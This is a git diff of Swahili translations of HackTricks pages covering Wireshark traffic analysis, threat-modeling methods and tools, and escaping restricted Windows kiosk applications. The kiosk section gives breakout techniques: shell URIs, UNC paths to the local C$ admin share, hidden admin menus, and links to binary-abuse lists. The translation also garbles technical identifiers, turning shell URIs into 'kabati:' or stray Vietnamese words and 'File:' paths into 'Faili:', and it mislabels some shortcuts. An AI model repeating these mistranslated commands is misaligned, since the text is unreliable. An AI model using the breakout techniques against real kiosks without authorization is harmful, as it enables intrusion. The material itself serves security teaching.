Chini ya _**Statistics --> I/O Graph**_ unaweza kupata **grafu ya mawasiliano.**
![](<../../../.gitbook/assets/image (989).png>)
@ -85,19 +97,19 @@ Vichujio vingine vya kuvutia:
### Tafuta
Ikiwa unataka **tafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye mstari wa habari kuu (Namba, Wakati, Chanzo, n.k.) kwa kubonyeza kitufe cha kulia na kisha hariri safu.
Ikiwa unataka **tafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye bar ya habari kuu (Namba, Wakati, Chanzo, n.k.) kwa kubonyeza kitufe cha kulia na kisha hariri safu.
### Maabara za pcap za bure
### Maabara za pcap za Bure
**Jifunze na changamoto za bure za:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
## Kutambua Domains
Unaweza kuongeza safu inayoonyesha Kichwa cha Mwenyeji wa HTTP:
Unaweza kuongeza safu inayoonyesha Kichwa cha HTTP cha Mwenyeji:
![](<../../../.gitbook/assets/image (635).png>)
Na safu inayoongeza jina la Seva kutoka kwa uhusiano wa HTTPS wa kuanzisha (**ssl.handshake.type == 1**):
Na safu inayoongeza jina la Seva kutoka kwa uunganisho wa HTTPS wa kuanzisha (**ssl.handshake.type == 1**):
![](<../../../.gitbook/assets/image (408) (1).png>)
@ -117,7 +129,7 @@ Kwenye Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP`
### Kufichua trafiki ya https na ufunguo binafsi wa seva
_edit>mapendeleo>itifaki>ssl>_
_badilisha>mapendeleo>itifaki>ssl>_
![](<../../../.gitbook/assets/image (1100).png>)
@ -127,19 +139,18 @@ Bonyeza _Hariri_ na ongeza data yote ya seva na ufunguo binafsi (_IP, Bandari, I
Firefox na Chrome zote zina uwezo wa kurekodi funguo za kikao za TLS, ambazo zinaweza kutumika na Wireshark kufichua trafiki ya TLS. Hii inaruhusu uchambuzi wa kina wa mawasiliano salama. Maelezo zaidi juu ya jinsi ya kufanya ufichuzi huu yanaweza kupatikana kwenye mwongozo kwenye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
Ili kugundua hii tafuta ndani ya mazingira kwa kivinjari `SSLKEYLOGFILE`
Ili kugundua hii, tafuta ndani ya mazingira kwa kivinjari `SSLKEYLOGFILE`
Faili ya funguo zilizoshirikiwa itaonekana kama hii:
Faili ya funguo za pamoja itaonekana kama hii:
![](<../../../.gitbook/assets/image (817).png>)
Kuagiza hii kwenye wireshark enda kwa \_hariri > mapendeleo > itifaki > ssl > na iagize kwenye (Pre)-Master-Secret log filename:
![](<../../../.gitbook/assets/image (986).png>)
## Mawasiliano ya ADB
Chambua APK kutoka kwa mawasiliano ya ADB ambapo APK ilitumwa:
Chambua APK kutoka kwenye mawasiliano ya ADB ambapo APK ilitumwa:
```python
from scapy.all import *
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -1,8 +1,8 @@
# Kufikiria Tishio
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
@ -16,35 +16,35 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Kufikiria Tishio
Karibu kwenye mwongozo kamili wa HackTricks kuhusu Kufikiria Tishio! Anza safari ya kuchunguza sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mada hii inatumika kama mwongozo wa hatua kwa hatua uliojaa mifano halisi, programu inayofaa, na maelezo rahisi kueleweka. Ideal kwa wataalamu wa novice na wale wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao.
Karibu kwenye mwongozo kamili wa HackTricks kuhusu Kufikiria Tishio! Anza safari ya kuchunguza sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mada hii inatumika kama mwongozo wa hatua kwa hatua uliojaa mifano halisi, programu za kusaidia, na maelezo rahisi kueleweka. Ideal kwa wapya na wataalamu wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao.
### Matukio Yanayotumiwa Mara kwa Mara
1. **Maendeleo ya Programu**: Kama sehemu ya Mzunguko wa Maendeleo Salama wa Programu (SSDLC), kufikiria tishio husaidia katika ** kutambua vyanzo vya uwezekano wa udhaifu ** katika hatua za mwanzo za maendeleo.
2. **Upimaji wa Kuingilia**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **kufikiria tishio kuelewa udhaifu wa mfumo** kabla ya kutekeleza jaribio.
2. **Upimaji wa Kuingilia**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **kufikiria tishio kuelewa udhaifu wa mfumo** kabla ya kufanya jaribio.
### Mfano wa Tishio kwa Kifupi
### Kufikiria Tishio kwa Kifupi
Mfano wa Tishio kawaida huonyeshwa kama ramani, picha, au aina nyingine ya mchoro wa kuonyesha usanidi uliopangwa au ujenzi uliopo wa programu. Inafanana na **ramani ya mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama.
Kufikiria Tishio kawaida hurejelezwa kama ramani, picha, au aina nyingine ya mchoro wa kuonyesha usanidi uliopangwa au ujenzi uliopo wa programu. Inafanana na **mchoro wa mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama.
Mifano ya tishio mara nyingi huonyesha vipengele vilivyowekwa kwa rangi nyekundu, ikimaanisha udhaifu, hatari, au vizuizi. Ili kusonga mchakato wa kutambua hatari, triadi ya CIA (Usiri, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa mbinu nyingi za kufikiria tishio, na STRIDE ikiwa moja ya kawaida zaidi. Walakini, mbinu iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum.
Mifano ya tishio mara nyingi huwa na vipengele vilivyochorwa kwa rangi nyekundu, vikimaanisha udhaifu, hatari, au vizuizi. Ili kusonga mchakato wa kutambua hatari, triadi ya CIA (Usiri, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa mbinu nyingi za kufikiria tishio, na STRIDE ikiwa moja ya kawaida zaidi. Walakini, mbinu iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum.
### Triadi ya CIA
Triadi ya CIA ni mfano unaotambuliwa sana katika uga wa usalama wa habari, ikimaanisha Usiri, Uadilifu, na Upatikanaji. Nguzo hizi tatu hufanya msingi ambao hatua nyingi za usalama na sera zinajengwa, pamoja na mbinu za kufikiria tishio.
Triadi ya CIA ni mfano unaotambulika sana katika uga wa usalama wa habari, ikimaanisha Usiri, Uadilifu, na Upatikanaji. Nguzo hizi tatu hufanya msingi ambao hatua nyingi za usalama na sera zinajengwa, pamoja na mbinu za kufikiria tishio.
1. **Usiri**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasio na idhini. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine kuzuia uvujaji wa data.
2. **Uadilifu**: Uwazi, uadilifu, na uaminifu wa data wakati wa mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyo na idhini. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data.
3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walio na idhini wanapohitajika. Mara nyingi inahusisha redundancy, uvumilivu wa makosa, na miundo ya upatikanaji wa juu ili kuhakikisha mifumo inaendelea hata katika kipindi cha vurugu.
1. **Usiri**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasiohalali. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine za kuzuia uvujaji wa data.
2. **Uadilifu**: Uaminifu, uadilifu, na uaminifu wa data wakati wa mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyoruhusiwa. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data.
3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walioruhusiwa wanapohitajika. Mara nyingi inahusisha redundancies, uvumilivu wa makosa, na mipangilio ya upatikanaji wa juu ili kuendelea kuendesha mifumo hata katika kesi ya vurugu.
### Mbinu za Kufikiria Tishio
1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupi cha **Kujifanya, Kuharibu, Kukataa, Kufichua Habari, Kukataa Huduma, na Kuinua Uwezo wa Haki**. Kila jamii inawakilisha aina ya tishio, na mbinu hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo kutambua tishio la uwezekano.
2. **DREAD**: Hii ni mbinu nyingine kutoka Microsoft inayotumika kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Uharibifu wa Uwezo, Uwezekano wa Kurudia, Uwezekano wa Kutumia, Watumiaji Wanaoathiriwa, na Ugunduzi**. Kila moja ya sababu hizi hupewa alama, na matokeo hutumiwa kipaumbele tishio lililotambuliwa.
1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupi cha **Kujifanya, Kuharibu, Kukana, Kufichua Habari, Kukataa Huduma, na Kuinua Uwezo wa Haki**. Kila jamii inawakilisha aina ya tishio, na mbinu hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo kutambua tishio la uwezekano.
2. **DREAD**: Hii ni mbinu nyingine kutoka Microsoft inayotumika kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Uharibifu wa Uwezo, Uwezekano wa Kurudia, Uwezekano wa Kutumika, Watumiaji Wanaoathiriwa, na Uwezekano wa Kugundulika**. Kila moja ya vipengele hivi hupewa alama, na matokeo hutumiwa kipaumbele tishio lililotambuliwa.
3. **PASTA** (Mchakato wa Ukweli wa Mashambulizi na Uchambuzi wa Tishio): Hii ni mbinu ya hatua saba, **yenye msingi wa hatari**. Inajumuisha kufafanua na kutambua malengo ya usalama, kuunda wigo wa kiufundi, uchambuzi wa tishio, uchambuzi wa udhaifu, na tathmini ya hatari/uchaguzi.
4. **Trike**: Hii ni mbinu inayolenga hatari ambayo inazingatia kulinda mali. Inaanza kutoka mtazamo wa **usimamizi wa hatari** na kutazama tishio na udhaifu katika muktadha huo.
5. **VAST** (Kufikiria Tishio kwa njia ya Visual, Agile, na Rahisi): Mbinu hii inalenga kuwa rahisi zaidi na inaingiliana katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka kwa mbinu zingine na inazingatia **uwakilishi wa visual wa tishio**.
6. **OCTAVE** (Tathmini ya Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushauri wa CERT, mfumo huu unalenga kwa **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**.
4. **Trike**: Hii ni mbinu inayolenga hatari na inazingatia kulinda mali. Inaanza kutoka mtazamo wa **usimamizi wa hatari** na kutazama tishio na udhaifu katika muktadha huo.
5. **VAST** (Kufikiria Tishio kwa njia ya Visual, Agile, na Rahisi): Mbinu hii inalenga kuwa rahisi kufikika na kuingiliana katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka kwa mbinu zingine na inazingatia **uwakilishi wa visual wa tishio**.
6. **OCTAVE** (Tathmini ya Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushirikiano cha CERT, mfumo huu unalenga **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**.
## Zana
@ -66,7 +66,7 @@ Kifaa cha msalaba cha juu cha jukwaa na GUI nyingi kwa wataalamu wa usalama wa m
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza mifumo pamoja na injini ya sheria ya kuzalisha moja kwa moja tishio/mitigations.
Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza michoro ya mfumo pamoja na injini ya sheria ya kuzalisha moja kwa moja tishio/mitigations.
**Matumizi**
@ -97,8 +97,8 @@ Kidogo kuhusu maelezo ya vitu:
* Mchakato (Entiti yenyewe kama Seva ya Wavuti au utendaji wa wavuti)
* Mwigizaji (Mtu kama Mtembeleaji wa Wavuti, Mtumiaji au Msimamizi)
* Mstari wa Mzunguko wa Data (Kiashiria cha Mwingiliano)
* Mpaka wa Uaminifu (Maeneo tofauti ya mtandao au mazingira.)
* Hifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases)
* Mipaka ya Uaminifu (Maeneo tofauti ya mtandao au mizunguko.)
* Uhifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases)
5. Unda Tishio (Hatua 1)
@ -110,27 +110,27 @@ Sasa unaweza kuunda tishio
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
Kumbuka kuna tofauti kati ya Tishio la Mwigizaji na Tishio la Mchakato. Ikiwa ungeongeza tishio kwa Mwigizaji basi utaweza kuchagua "Kujifanya" na "Kukataa". Walakini katika mfano wetu tunaweka tishio kwa entiti ya Mchakato kwa hivyo tutapata hii katika sanduku la uundaji wa tishio:
Kumbuka kuwa kuna tofauti kati ya Tishio la Mwigizaji na Tishio la Mchakato. Ikiwa ungeongeza tishio kwa Mwigizaji basi utaweza kuchagua tu "Kujifanya" na "Kukana". Walakini katika mfano wetu tunaweka tishio kwa entiti ya Mchakato hivyo tutauona huu katika sanduku la uundaji wa tishio:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. Maliza
Sasa mfano wako uliomalizika unapaswa kuonekana kama hivi. Na hivi ndivyo unavyounda mfano rahisi wa tishio na OWASP Threat Dragon.
Sasa mfano wako uliomalizika unapaswa kuonekana kama hivi. Na hivyo ndivyo unavyounda mfano rahisi wa tishio na OWASP Threat Dragon.
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Chombo cha Microsoft Threat Modeling](https://aka.ms/threatmodelingtool)
Hii ni chombo cha bure kutoka Microsoft kinachosaidia katika kutambua vitisho katika hatua ya kubuni miradi ya programu. Hutumia mbinu ya STRIDE na ni hasa inafaa kwa wale wanaoendeleza kwenye mfumo wa Microsoft.
Hii ni chombo cha bure kutoka Microsoft kinachosaidia katika kutambua vitisho katika hatua ya kubuni ya miradi ya programu. Hutumia mbinu ya STRIDE na ni hasa inafaa kwa wale wanaoendeleza kwenye mfumo wa Microsoft.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

View file

@ -4,19 +4,19 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
@ -28,7 +28,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
# Angalia vitendo vinavyowezekana ndani ya programu ya GUI
**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kufikia ufanisi wa Explorer ikiwa unaweza kufikia chaguo hizi:
**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kupata ufanisi wa Explorer ikiwa unaweza kupata chaguo hizi:
* Funga/Funga kama
* Fungua/Fungua na
@ -46,11 +46,11 @@ Unapaswa kuangalia ikiwa unaweza:
## Utekelezaji wa Amri
Labda **ukitumia chaguo la `Fungua na`** unaweza kufungua/tekeleza aina fulani ya shell.
Labda **ukitumia chaguo la `Fungua na`** unaweza kufungua/tekeleza aina fulani ya kabati.
### Windows
Kwa mfano _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ pata zaidi ya binaries ambazo zinaweza kutumika kutekeleza amri (na kufanya vitendo visivyotarajiwa) hapa: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
Kwa mfano _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ pata zaidi ya faili za binari zinazoweza kutumika kutekeleza amri (na kufanya vitendo visivyotarajiwa) hapa: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
### \*NIX __
@ -63,9 +63,9 @@ _bash, sh, zsh..._ Zaidi hapa: [https://gtfobins.github.io/](https://gtfobins.gi
* **Mazingira ya mazingira**: Kuna mazingira mengi ya mazingira yanayoelekeza kwenye njia fulani
* **Itifaki zingine**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **Viungo vya ishara**
* **Vidirisha vya mkato**: CTRL+N (fungua kikao kipya), CTRL+R (Tekeleza Amri), CTRL+SHIFT+ESC (Meneja wa Kazi), Windows+E (fungua explorer), CTRL-B, CTRL-I (Vipendwa), CTRL-H (Historia), CTRL-L, CTRL-O (Faili/Dirisha la Kufungua), CTRL-P (Dirisha la Kuchapisha), CTRL-S (Hifadhi Kama)
* **Vielekezi**: CTRL+N (fungua kikao kipya), CTRL+R (Tekeleza Amri), CTRL+SHIFT+ESC (Meneja wa Kazi), Windows+E (fungua Explorer), CTRL-B, CTRL-I (Vipendwa), CTRL-H (Historia), CTRL-L, CTRL-O (Faili/Dirisha la Kufungua), CTRL-P (Dirisha la Kuchapisha), CTRL-S (Hifadhi Kama)
* Menyu ya Utawala iliyofichwa: CTRL-ALT-F8, CTRL-ESC-F9
* **URIs za Shell**: _shell:Vyombo vya Utawala, shell:Thư viện tài liệu, shell:Thư việnshell:Profiles za Watumiaji, shell:Binafsi, shell:Dirisha la Nyumbani la Utafutaji, shell:Mfumo wa Utafutaji, shell:Watumiaji, shell:Vyombo vya Utawala vya Kawaida, shell:KompyutaYangu, shell:Folder la Mtandao_
* **URI za Kabati**: _kabati:Vyombo vya Utawala, kabati:ThesisLibrary, kabati:Vitabu vya Maktaba, kabati:Profaili za Mtumiaji, kabati:Binafsi, kabati:ThesisHomeFolder, kabati:Mfumo wa kabati:Vifaa vya Mtandao, kabati:SendTo, kabati:Profaili za Watumiaji, kabati:Vyombo vya Utawala vya Kawaida, kabati:KompyutaYangu, kabati:Intaneti_
* **Njia za UNC**: Njia za kuunganisha folda zilizoshirikiwa. Jaribu kuunganisha C$ ya mashine ya ndani ("\\\127.0.0.1\c$\Windows\System32")
* **Njia zaidi za UNC:**
@ -81,40 +81,40 @@ _bash, sh, zsh..._ Zaidi hapa: [https://gtfobins.github.io/](https://gtfobins.gi
| %TMP% | %USERDOMAIN% | %USERNAME% |
| %USERPROFILE% | %WINDIR% | |
## Pakua Binaries Zako
## Pakua Binari Zako
Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
## Kufikia mfumo wa faili kutoka kwenye kivinjari
## Kupata mfumo wa faili kutoka kwenye kivinjari
| NJIA | NJIA | NJIA | NJIA |
| ------------------- | ----------------- | ------------------ | ------------------- |
| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows |
| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ |
| Faili:/C:/windows | Faili:/C:/windows/ | Faili:/C:/windows\\ | Faili:/C:\windows |
| Faili:/C:\windows\\ | Faili:/C:\windows/ | Faili://C:/windows | Faili://C:/windows/ |
| Faili://C:/windows\\ | Faili://C:\windows | Faili://C:\windows/ | Faili://C:\windows\\ |
| C:/windows | C:/windows/ | C:/windows\\ | C:\windows |
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
| %HOMEDRIVE% | %HOMESHARE | | <p><br></p> |
## Vidirisha vya Mkato
## Vielekezi
* Vitufe vya Sticky Bonyeza SHIFT mara 5
* Vitufe vya Panya SHIFT+ALT+NUMLOCK
* Mfumo wa Juu SHIFT+ALT+PRINTSCN
* Vitufe vya Toggle Shikilia NUMLOCK kwa sekunde 5
* Vitufe vya Kichujio Shikilia SHIFT ya kulia kwa sekunde 12
* Vielekezi vya Kufunga Bonyeza SHIFT mara 5
* Vielekezi vya Panya SHIFT+ALT+NUMLOCK
* Mabadiliko ya Juu SHIFT+ALT+PRINTSCN
* Vielekezi vya Toggle Shikilia NUMLOCK kwa sekunde 5
* Vielekezi vya Kichujio Shikilia SHIFT ya kulia kwa sekunde 12
* WINDOWS+F1 Tafuta Windows
* WINDOWS+D Onyesha Daki
* WINDOWS+E Anzisha Explorer ya Windows
* WINDOWS+D Onyesha Dakiika
* WINDOWS+E Anzisha Windows Explorer
* WINDOWS+R Tekeleza
* WINDOWS+U Kituo cha Upatikanaji Rahisi
* WINDOWS+F Tafuta
* SHIFT+F10 Menyu ya Muktadha
* CTRL+SHIFT+ESC Meneja wa Kazi
* CTRL+ALT+DEL Skrini ya kuingia kwenye toleo jipya la Windows
* CTRL+ALT+DEL Skrini ya Kufurahisha kwenye toleo jipya la Windows
* F1 Msaada F3 Tafuta
* F6 Mstari wa Anwani
* F11 Badilisha skrini nzima ndani ya Internet Explorer
@ -125,8 +125,8 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour
* CTRL+S Hifadhi CTRL+N RDP Mpya / Citrix
## Swipes
* Piga kwa upande wa kushoto kwenda kulia kuona Madirisha yote yaliyofunguliwa, kupunguza programu ya KIOSK na kupata OS nzima moja kwa moja;
* Piga kwa upande wa kulia kwenda kushoto kufungua Kituo cha Matendo, kupunguza programu ya KIOSK na kupata OS nzima moja kwa moja;
* Piga kwa upande wa kushoto kwenda kulia kuona Madirisha yote yaliyofunguliwa, kupunguza programu ya KIOSK na kupata mfumo wa uendeshaji moja kwa moja;
* Piga kwa upande wa kulia kwenda kushoto kufungua Kituo cha Matendo, kupunguza programu ya KIOSK na kupata mfumo wa uendeshaji moja kwa moja;
* Piga kwa ndani kutoka pembe ya juu kuifanya upau wa kichwa uonekane kwa programu iliyofunguliwa kwa mode kamili ya skrini;
* Piga juu kutoka chini kuonyesha upau wa kazi katika programu ya skrini kamili.
@ -134,7 +134,7 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour
### 'Mwambaa wa Picha'
Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma Baruapepe, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer.
Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma kwa Barua pepe, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer.
### Itifaki ya Shell
@ -145,17 +145,17 @@ Andika URL hizi kupata mtazamo wa Explorer:
* `shell:Vifaa vya Maktaba`
* `shell:Profaili za Mtumiaji`
* `shell:Binafsi`
* `shell:Folderi ya Nyumbani ya Utafutaji`
* `shell:Folderi za Nafasi za Mtandao`
* `shell:Kutafuta Folda ya Nyumbani`
* `shell:Folda za Nafasi za Mtandao`
* `shell:Tuma Kwa`
* `shell:Profaili za Mtumiaji`
* `shell:Vifaa vya Utawala wa Kawaida`
* `shell:Folderi ya Kompyuta Yangu`
* `shell:Folderi ya Mtandao`
* `shell:Funga Kompyuta Yangu`
* `shell:Funga Mtandao`
* `Shell:Profaili`
* `Shell:Faili za Programu`
* `Shell:Mfumo`
* `Shell:Folderi ya Udhibiti wa Paneli`
* `Shell:Folda ya Udhibiti wa Paneli`
* `Shell:Windows`
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Udhibiti wa Paneli
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Kompyuta Yangu
